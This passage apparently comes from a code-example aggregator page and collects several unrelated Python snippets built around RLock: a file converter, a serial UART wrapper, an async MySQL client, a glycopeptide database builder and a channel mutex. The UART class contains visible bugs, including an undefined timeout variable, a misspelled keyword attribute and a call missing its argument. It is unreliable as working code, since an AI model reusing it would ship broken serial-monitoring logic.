                # Check whether or not the last modification of the source file has been later than the last modification of the destination file
                # Update if newer
                if srcFile.stat().st_mtime < dstFile.lstat().st_mtime:
                    skipFile = True
                else:
                    skipFile = False
            else:
                skipFile = True # In all other cases: it's better to skip this file
        elif self.__metadataonly:
            skipFile = True
        # Do the work!
        if not skipFile:
            try:
                srcFileStr = (str(srcFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                dstFileStr = (str(dstFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                #print ('"'+srcFileStr+'"\n -> "'+dstFileStr+'"')
            except Exception as e:
                logging.error('An exception occured: '+str(e))
            self.__mutex.acquire()
            future = self.__executer.submit(createWorker, self.__verbose, self.__metadataonly, self.__converter, self.__evInterrupted, srcFile, dstFile)
            self.__futures.append(future)
            future.add_done_callback(self.finished)
            self.__mutex.release()
            
    def copyFile(self, srcFile, dstDir):
        ':type file: Path'
        ':type dst: Path'
        dstFile = dstDir.joinpath(srcFile.parts[-1])
        skipFile = False
        if dstFile.exists():
            if dstFile.is_symlink() or not os.access(dstFile.as_posix(), os.W_OK):
                skipFile = True # Skip all symlinks and destination files which are not writable
            elif self.__overwrite:
                skipFile = False # Overwrite file as requested!
            elif self.__overwriteIfSrcNewer:
                # Check whether or not the last modification of the source file has been later than the last modification of the destination file
                # Update if newer
                if srcFile.stat().st_mtime < dstFile.lstat().st_mtime:
                    skipFile = True
                else:
                    skipFile = False
            else:
                skipFile = True # In all other cases: it's better to skip this file
        elif self.__metadataonly:
            skipFile = True
        # Do the work!
        if not skipFile:
            try:
                srcFileStr = (str(srcFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                dstFileStr = (str(dstFile)).encode(sys.stdout.encoding, errors='replace').decode(sys.stdout.encoding)
                shutil.copyfile(srcFileStr, dstFileStr)
            except Exception as e:
                logging.error('An exception occured: '+str(e))
    
    def handlePathRecursively(self, src, dst):
        ':type src: Path'
        ':type dst: Path'
        if not src.exists():
            raise FileNotFoundError(src)
        if src.is_file():
            self.handleFiles(src, self.deriveDstFile(src, dst))
        elif src.is_dir():
            #for file in src.glob('*.'+self.__srcExt):
            for p in src.iterdir():
                ':type p: Path'
                if (self.__evInterrupted.is_set()):
                    break
                if p.is_file():
                    if p.name.endswith('.'+self.__srcExt):
                        self.handleFiles(p, dst)
                    else:
                        for cover_ext in self.__coverExtList:
                            if p.name.endswith('.'+cover_ext):
                                self.copyFile(p, dst)
                                break;
                elif self.__recursive and p.is_dir():
                    dstSubDir = dst.joinpath(p.parts[-1])
                    ': :type dstSubDir: Path'
                    if not dstSubDir.exists():
                        dstSubDir.mkdir()
                    self.handlePathRecursively(p, dstSubDir)

    def deriveDstFile(self, src, dst):
        ':type src: Path'
        ':type dst: Path'
        if dst.is_file():
            return dst
        if dst.is_dir():
            filename = src.name
            ': :type filename: str'
            if filename.endswith('.'+self.__srcExt):
                #filename.replace(self.__srcExt, self.__dstExt, -1)
                i = filename.rfind('.'+self.__srcExt)
                if i==-1:
                    filename = filename+self.__dstExt
                else:
                    filename = filename[0:i]+"."+self.__dstExt
            return dst.joinpath(filename)
        raise Exception("Error: Destination file '"+str(dst)+"' is neither a file nor an (existing) directory")

    def run(self):
        try:
            if self.__src.exists() and not self.__dst.exists():
                self.__dst.mkdir(parents=True)
            logging.info("Analyzing specified files/directories...")
            self.handlePathRecursively(self.__src, self.__dst)
            finished=False
            while not finished:
                finished=True
                self.__mutex.acquire()
                for f in self.__futures:
                    if not (f.done() or f.cancelled()):
                        finished=False
                self.__mutex.release()
                try:
                    time.sleep(0.1)
                except InterruptedError:
                    pass
            logging.info("Conversion finished")
        except FileNotFoundError as e:
            logging.error('Source file or directory not found: "'+str(e)+'"')
        
    def runTest(self):
        try:
#             self.__mutex.acquire()
            for i in range(6):
                ev = Event()
                self.__mutex.acquire()
                future = self.__executer.submit(createWorker, i, ev)
                self.__futures.append(future)
                self.__futureEvents[future] = ev
                future.add_done_callback(self.finished)
                self.__mutex.release()
                try:
                    time.sleep(2)
                except InterruptedError:
                    pass
                if (self.__evInterrupted.is_set()):
                    break
            #wait(self.__futures, timeout=None, return_when=ALL_COMPLETED)
            finished=0
            while not finished:
                finished=1
#                 print ("waiting: Acquire lock")
                self.__mutex.acquire()
                for f in self.__futures:
                    if not (f.done() or f.cancelled()):
                        finished=0
#                 print ("waiting: Release lock")
                self.__mutex.release()
#            while not(all((f.done() or f.cancelled()) for f in self.__futures)):
#                pass
            logging.info("All tasks are finished")
        except KeyboardInterrupt:
            pass
        
    def interrupt(self):
        logging.info("Sending CTRL-C event to all threads")
        self.__executer.shutdown(wait=False)
        self.__evInterrupted.set()

    def finished(self, future):
        self.__mutex.acquire()
        self.__futures.remove(future)
        self.__mutex.release()
        try:
            future.result()
        except Exception as e:
            logging.error("Worker exited with exception: "+str(e))
Esempio n. 44
0
class uart:
    def __init__(self, port=1, baudrate=115200, log=False):
        self.__keywords = []
        self.monitor_string = None
        self.__port = port
        self.__serial = serial.serial_for_url(
            "COM{num}".format(num=self.__port),
            baudrate,
            parity="N",
            rtscts=False,
            xonxoff=False,
            timeout=1,
            do_not_open=True,
        )
        self.__serial.open()
        self.__serial_io = io.TextIOWrapper(io.BufferedRWPair(self.__serial, self.__serial))
        self.__cmd_queue = Queue()
        self.__rx_thread = threading.Thread(target=self.__read_thread, name="rx_thread")
        self.__rx_thread.setDaemon(True)
        self.__rx_thread.start()
        self.__tx_thread = threading.Thread(target=self.__write_thread, name="tx_thread")
        self.__tx_thread.setDaemon(True)
        self.__tx_thread.start()
        self.__mutex = RLock()
        self.__log = log
        self.__is_monitor_rx_enable = False
        self.__echo_method = None
        if log is True:
            ltime = time.localtime(time.time())
            logging.basicConfig(
                filename="log_{mon}_{date}_{h}_{m}_{s}.txt".format(
                    mon=str(ltime.tm_mon).zfill(2),
                    date=str(ltime.tm_mday).zfill(2),
                    h=str(ltime.tm_hour).zfill(2),
                    m=str(ltime.tm_min).zfill(2),
                    s=str(ltime.tm_sec).zfill(2),
                ),
                level=logging.DEBUG,
            )

    def SetEchoFunction(self, method):
        self.__echo_method = method

    def __read_thread(self):
        while True:
            data = self.__serial_io.readline()
            if len(data):
                # print(data)
                if self.__echo_method is not None:
                    self.__echo_method(data)
                if self.__log is True:
                    logging.info("[RX]" + str(data))
            self.__monitor_rx_string_method(data)

    def __write_thread(self):
        while True:
            if not self.__cmd_queue.empty():
                send_data = self.__cmd_queue.get()
                self.__serial_io.write(send_data)
                self.__serial_io.flush()
                if self.__log is True:
                    logging.info("[TX]" + str(send_data))
            time.sleep(0.05)

    def __monitor_rx_string_method(self, data):
        self.__mutex.acquire()
        if self.__is_monitor_rx_enable is True:
            if self.__isMatchString(data) is True:
                self.__is_monitor_rx_enable = False
        self.__mutex.release()

    def __isMatchString(self, data):
        is_hit_string = False
        for keyword in self.__keywords:
            if re.search(keyword, data):
                is_hit_string = True
                break
        return is_hit_string

    def Send(self, content, wait_string_list=[], wait_string_timeout=0):
        assert isinstance(content, str) is True, "content is not string"
        assert type(wait_string_list) is list, "wait_string_list must be list"
        if len(wait_string_list) > 0:
            self._update_keywords(wait_string_list)
            self.__cmd_queue.put(content)
            start_time = time.time()
            while self.__is_monitor_rx_enable is True:
                if timeout is not 0:
                    if time.time() - start_time >= timeout:
                        break
            if self.__is_monitor_rx_enable is True:
                self.__mutex.acquire()
                self.__is_monitor_rx_enable = False
                self.__mutex.release()
                return False
            return True
        else:
            self.__cmd_queue.put(content)
            return True

    def Connect(self):
        if self.__serial.isOpen() == False:
            self.__serial.open()

    def Disconnect(self):
        self.__serial.close()

    def _update_keywords(self, string_list):
        self.__mutex.acquire()
        self.__keyworks = string_list
        self.__is_monitor_rx_enable = True
        self.__mutex.release()

    def WaitString(self, string_list, timeout=0):
        assert type(string_list) is list, "string_list must be list"
        assert len(string_list) > 0, "what string you want to wait"
        assert self.__is_monitor_rx_enable is False, "__is_monitor_rx_enable is True"
        start_time = time.time()
        self._update_keywords()
        while self.__is_monitor_rx_enable is True:
            if timeout is not 0:
                if time.time() - start_time >= timeout:
                    break
        if self.__is_monitor_rx_enable is True:
            self.__mutex.acquire()
            self.__is_monitor_rx_enable = False
            self.__mutex.release()
            return False
        return True
Esempio n. 45
0
class Client(object):
    def __init__(self, *args, **kwargs):
        self._args = args
        self._kwargs = kwargs
        self._connection = None
        self._closed = False
        self._close_callback = None
        self._io_loop = kwargs.pop('io_loop', None)

        self.__cursor_lock = RLock()

        if self._io_loop is None:
            self._io_loop = IOLoop.current()

        if "cursorclass" in kwargs and issubclass(kwargs["cursorclass"], Cursor):
            kwargs["cursorclass"] = kwargs["cursorclass"].__delegate_class__

    def connect(self):
        future = Future()

        def on_connect(connection_future):
            if connection_future._exc_info is None:
                self._connection = connection_future._result
                self._connection.set_close_callback(self.on_close)
                future.set_result(self)
            else:
                future.set_exc_info(connection_future._exc_info)

        connection_future = async_call_method(Connection, *self._args, **self._kwargs)

        IOLoop.current().add_future(connection_future, on_connect)
        return future

    def on_close(self):
        self._closed = True

        if self._close_callback and callable(self._close_callback):
            self._close_callback(self)

        self._close_callback = None

    def set_close_callback(self, callback):
        self._close_callback = callback

    def close(self):
        if self._closed:
            return
        return async_call_method(self._connection.close)

    def autocommit(self, value):
        return async_call_method(self._connection.autocommit, value)

    def begin(self):
        return async_call_method(self._connection.begin)

    def commit(self):
        return async_call_method(self._connection.commit)

    def rollback(self):
        return async_call_method(self._connection.rollback)

    def show_warnings(self):
        return async_call_method(self._connection.show_warnings)

    def select_db(self, db):
        return async_call_method(self._connection.select_db, db)

    def cursor(self, cursor_cls=None):
        if cursor_cls is None:
            cursor_cls = self._connection.cursorclass

        if not self.__cursor_lock.acquire(0):
            raise RuntimeError("Connection might provide only one opened cursor")

        if cursor_cls and issubclass(cursor_cls, Cursor):
            original_cursor_cls = cursor_cls.__delegate_class__
        else:
            original_cursor_cls = cursor_cls

        cursor = self._connection.cursor(original_cursor_cls)
        cursor_cls = cursor_cls if issubclass(cursor_cls, Cursor) else cursor.__mytor_class__

        cursor = cursor_cls(cursor)
        cursor._release_lock = lambda *a: self.__cursor_lock.release()
        return cursor

    def query(self, sql, unbuffered=False):
        return async_call_method(self._connection.query, sql, unbuffered)

    def next_result(self):
        return async_call_method(self._connection.next_result)

    def kill(self, thread_id):
        return async_call_method(self._connection.kill, thread_id)

    def ping(self, reconnect=True):
        return async_call_method(self._connection.ping, reconnect)

    def set_charset(self, charset):
        return async_call_method(self._connection.set_charset, charset)

    def __getattr__(self, name):
        return getattr(self._connection, name)
Esempio n. 46
0
class MultipleProcessPeptideGlycosylator(TaskBase):
    def __init__(self, connection_specification, hypothesis_id, chunk_size=6500, n_processes=4,
                 glycan_combination_count=None, glycan_limit=_DEFAULT_GLYCAN_STEP_LIMIT):
        self.n_processes = n_processes
        self.connection_specification = connection_specification
        self.chunk_size = chunk_size
        self.hypothesis_id = hypothesis_id
        self.glycan_combination_count = glycan_combination_count
        self.current_glycan_offset = 0
        self.glycan_limit = glycan_limit

        self.input_queue = Queue(10)
        self.output_queue = Queue(1000)
        self.workers = []
        self.dealt_done_event = Event()
        self.ipc_controller = self.ipc_logger()
        self.database_mutex = RLock()

    def spawn_worker(self):
        worker = QueuePushingPeptideGlycosylatingProcess(
            self.connection_specification, self.hypothesis_id, self.input_queue,
            self.output_queue, self.chunk_size, self.dealt_done_event,
            self.ipc_controller.sender(), self.database_mutex,
            glycan_offset=self.current_glycan_offset,
            glycan_limit=self.glycan_limit)
        return worker

    def push_work_batches(self, peptide_ids):
        n = len(peptide_ids)
        i = 0
        chunk_size = min(int(n * 0.05), 1000)
        while i < n:
            self.input_queue.put(peptide_ids[i:(i + chunk_size)])
            i += chunk_size
            self.log("... Dealt Peptides %d-%d %0.2f%%" % (i - chunk_size, min(i, n), (min(i, n) / float(n)) * 100))
        self.log("... All Peptides Dealt")
        self.dealt_done_event.set()

    def create_barrier(self):
        self.database_mutex.__enter__()

    def teardown_barrier(self):
        self.database_mutex.__exit__(None, None, None)

    def create_queue_feeder_thread(self, peptide_ids):
        queue_feeder = Thread(target=self.push_work_batches, args=(peptide_ids,))
        queue_feeder.daemon = True
        queue_feeder.start()
        return queue_feeder

    def spawn_all_workers(self):
        self.workers = []

        for i in range(self.n_processes):
            worker = self.spawn_worker()
            worker.start()
            self.workers.append(worker)

    def process(self, peptide_ids):
        connection = DatabaseBoundOperation(self.connection_specification)
        session = connection.session

        self.log("Begin Creation. Dropping Indices")
        index_controller = toggle_indices(session, Glycopeptide)
        index_controller.drop()

        while self.current_glycan_offset < self.glycan_combination_count:
            _current_progress = float(self.current_glycan_offset + self.glycan_limit)
            _current_percent_complete = _current_progress / self.glycan_combination_count * 100.0
            _current_percent_complete = min(_current_percent_complete, 100.0)
            self.log("... Processing Glycan Combinations %d-%d (%0.2f%%)" % (
                self.current_glycan_offset, min(self.current_glycan_offset + self.glycan_limit,
                                                self.glycan_combination_count),
                _current_percent_complete))
            queue_feeder = self.create_queue_feeder_thread(peptide_ids)
            self.spawn_all_workers()

            has_work = True
            last = 0
            i = 0
            while has_work:
                try:
                    batch = self.output_queue.get(True, 5)
                    try:
                        waiting_batches = self.output_queue.qsize()
                        if waiting_batches > 10:
                            self.create_barrier()
                            self.log("... %d waiting sets." % (waiting_batches,))
                            try:
                                for _ in range(waiting_batches):
                                    batch.extend(self.output_queue.get(True, 1))
                                # check to see if any new work items have arrived while
                                # we've been draining the queue
                                waiting_batches = self.output_queue.qsize()
                                if waiting_batches != 0:
                                    # if so, while the barrier is up, let's write the batch
                                    # to disk and then try to drain the queue again
                                    i += len(batch)
                                    try:
                                        session.bulk_save_objects(batch)
                                        session.commit()
                                    except Exception:
                                        session.rollback()
                                        raise
                                    batch = []
                                    for _ in range(waiting_batches):
                                        batch.extend(self.output_queue.get_nowait())
                            except QueueEmptyException:
                                pass
                            self.teardown_barrier()
                    except NotImplementedError:
                        # platform does not support qsize()
                        pass

                    self.create_barrier()
                    i += len(batch)

                    try:
                        session.bulk_save_objects(batch)
                        session.commit()
                    except Exception:
                        session.rollback()
                        raise
                    finally:
                        self.teardown_barrier()

                    if (i - last) > self.chunk_size * 20:
                        self.log("... %d Glycopeptides Created" % (i,))
                        last = i
                except QueueEmptyException:
                    if all(w.is_work_done() for w in self.workers):
                        has_work = False
                    continue
            queue_feeder.join()
            self.ipc_controller.stop()
            for worker in self.workers:
                self.log("Joining Process %r (%s)" % (worker.pid, worker.is_alive()))
                worker.join()

            self.current_glycan_offset += self.glycan_limit

        self.log("All Work Done. Rebuilding Indices")
        index_controller.create()
Esempio n. 47
0
 def __init__(self, version=None, packagePath=None, packageName=None, rosMaster=None, overlayPath=None):
     localPipe, remotePipe = Pipe()
     self._pipe = localPipe
     self._rosRemote = _RosMulti(version, rosMaster, overlayPath, remotePipe)
     self._rosRemote.start()
     self._pipeLock = RLock()
Esempio n. 48
0
 def __init__(self, filename, mode="a", encoding=None, delay=0):
     WatchedFileHandler.__init__(self, filename, mode, encoding, delay)
     self._lock = RLock()
Esempio n. 49
0
 def __init__(self, idProduct=None, idVendor=None):
     """
     """
     self.lock = RLock()
     self.instr = self.connect(idProduct, idVendor)
     print("Asking *IDN? returns: {}".format(self.ask("*IDN?")))
Esempio n. 50
0
class ChannelMutex:
    def __init__(self):
        self.reader_mutex = RLock()
        self.writer_mutex = os.name != 'nt' and RLock() or None
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __getstate__(self):
        return self.reader_mutex, self.writer_mutex

    def __setstate__(self, state):
        self.reader_mutex, self.writer_mutex = state
        self.acquire = self._make_acquire_method()
        self.release = self._make_release_method()

    def __enter__(self):
        if self.acquire():
            return self
        else:
            raise ChannelError("Channel mutex time out")

    def __exit__(self, *_):
        self.release()

    def _make_acquire_method(self):
        def unix_acquire():
            return (self.reader_mutex.acquire(timeout=LOCK_TIMEOUT) and
                    self.writer_mutex.acquire(timeout=LOCK_TIMEOUT))

        def windows_acquire():
            return self.reader_mutex.acquire(timeout=LOCK_TIMEOUT)

        return os.name != 'nt' and unix_acquire or windows_acquire

    def _make_release_method(self):
        def unix_release():
            self.reader_mutex.release()
            self.writer_mutex.release()

        def windows_release():
            self.reader_mutex.release()

        return os.name != 'nt' and unix_release or windows_release

    @property
    @contextmanager
    def reader(self):
        if self.reader_mutex.acquire(timeout=LOCK_TIMEOUT):
            try:
                yield self
            finally:
                self.reader_mutex.release()
        else:
            raise ChannelError("Channel mutex time out")

    @property
    @contextmanager
    def writer(self):
        if self.writer_mutex.acquire(timeout=LOCK_TIMEOUT):
            try:
                yield self
            finally:
                self.writer_mutex.release()
        else:
            raise ChannelError("Channel mutex time out")